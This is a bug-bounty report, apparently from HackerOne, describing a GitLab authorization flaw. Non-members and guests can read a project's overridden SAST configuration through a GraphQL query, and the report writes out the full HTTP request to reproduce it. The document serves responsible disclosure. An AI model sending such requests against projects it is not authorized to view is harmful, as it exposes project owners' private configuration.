SAST CiConfiguration info visible of public/private project without permissions
HackerOne report #965602 by ashish_r_padelkar on 2020-08-24, assigned to @ankelly:
Report
Summary
Hello,
You can override SAST config info here at https://gitlab.com/<NameSpace>/<ProjectName>/-/security/configuration
You can read more about it here how to do it in UI https://gitlab.com/help/user/application_security/sast/index#configure-sast-in-the-ui
The changed information shouldn't be visible for users without permissions. However, any user can see this information of any public project (with no repository access) or guest users in private projects using graphQL query.
Steps to reproduce
1.Login as Maintainer and Go to your public project (With Repositories restricted only to team members) https://gitlab.com/<NameSpace>/<ProjectName>/-/security/configuration and enable the SAST config using merge request (change the default config).
-
Login as another user (who doesnt have any membership to above project). You shouldnt see SAST config change above as you dont have access to repositories from above projects.
-
Just run the GraphQL Query below using your CSRF token and cookies
POST /api/graphql HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 703
accept: */*
X-CSRF-Token: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
content-type: application/json
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/group_new_1/project2/-/security/configuration/sast
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: 1
[{"operationName":"sastCiConfiguration","variables":{"fullPath":"group_new_1/project2"},"query":"query sastCiConfiguration($fullPath: ID!) {\n project(fullPath: $fullPath) {\n sastCiConfiguration {\n global {\n nodes {\n ...SastCiConfigurationEntityFragment\n __typename\n }\n __typename\n }\n pipeline {\n nodes {\n ...SastCiConfigurationEntityFragment\n __typename\n }\n __typename\n }\n __typename\n }\n __typename\n }\n}\n\nfragment SastCiConfigurationEntityFragment on SastCiConfigurationEntity {\n defaultValue\n description\n field\n label\n type\n value\n __typename\n}\n"}] -
Change the
fullPathto path of public project and you should see the changed/overridden config in response in burp. -
This also happens in private projects too where guest are able to see this information.
What is the current bug behavior?
SAST config visible to other users without proper permissions
What is the expected correct behavior?
Only Developers and above roles should see this information in my opinion.
Output of checks
This bug happens on GitLab.com GitLab Enterprise Edition 13.3.0-pre 66a7f57b7dd
Regards,
Ashish
Impact
SAST config (Changed values) are visible to users without permissions in public projects ( with no repository access)
and Guest users are able to see this information in private projects too!